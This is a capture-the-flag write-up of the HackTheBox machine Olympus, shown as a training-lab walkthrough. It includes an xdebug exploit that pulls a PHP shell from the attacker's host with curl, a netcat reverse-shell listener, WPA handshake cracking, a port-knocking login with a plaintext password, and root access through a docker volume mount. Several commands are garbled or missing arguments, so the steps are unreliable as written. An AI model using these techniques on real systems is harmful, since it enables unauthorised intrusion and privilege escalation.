In this post we will resolve the machine Olympus from HackTheBox. It’s a medium level Linux Machine and one of my favorites.
I also take this opportunity to thank our teammate for the work done @OscarAkaElvis
My nick in HackTheBox is: manulqwerty. If you have any proposal or correction do not hesitate to leave a comment.
As always, the first thing will be a scan of all the ports with nmap :
nmap -p- -T4 nmap -sC -sV -p22,53,80,2222
It seems that we have a DNS server on port 53 , so far we have no information or domain to access.
Let’s check the web:
To list possible vulnerabilities we will use Nikto :
nikto -host
It seems to have xdebug enabled , which is used to debug php during server development, but which should not be used on a production server.
Let’s google about vulnerabilities that this can cause and found a repository that looks like we can get shell:
Let’s exploit it:
./ -u # We upload a shell; from the obtained shell: curl -O http://miIp/shell.php # Set the listener and execute the php that we just uploaded nc -lvp 1234 curl
Once we have entered we see that we are in a docker , because in the path / there is a file .dockerenv
In /home/zeus/airgeddon/captured we find a .cap file, we will pass it to our machine to see if we can crack it.
To crack the .cap file we will teach two methods:
Method 1 – Aircrack
aircrack-ng -a2 -w /usr/share/wordlists/rockyou.txt captured.cap
After almost 8 minutes:
Method 2 – Hashcat
# Let's convert the .cap in .hccapx with: -m 2500 -a 0 captured.hccapx /wordlists/rockyou.txt
After 1 and 7 seconds:
As you can see Hashcat is much faster, but in both cases we have obtained:
After several tests we find valid credentials for the SSH of port 2222:
ssh [email protected] -p 2222
In /home/icarus/help_of_the_gods.txt we read:
This file shows us a domain name, we will use dnsrecon to get more information:
dnsrecon -d ctfolympus.htb -n
The execution of this command returns something interesting: three integers, a username and a password; just look at the three numbers we think of port knocking:
knock 3456 8234 62431 && ssh [email protected] #Password: St34l_th3_F1re!
It seems that we have already left the dockers , we also see that we are in the docker group:
Executing the or with the following command we obtain interesting information from the docker:
docker --version 2>/dev/null; docker ps -a 2>/dev/null
After looking for some information on how to exploit this, we find that we can access it as root:
docker run -v /:/root -i -t olympia /bin/bash
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for enjoyment, since this this web page conations in fact
good funny data too.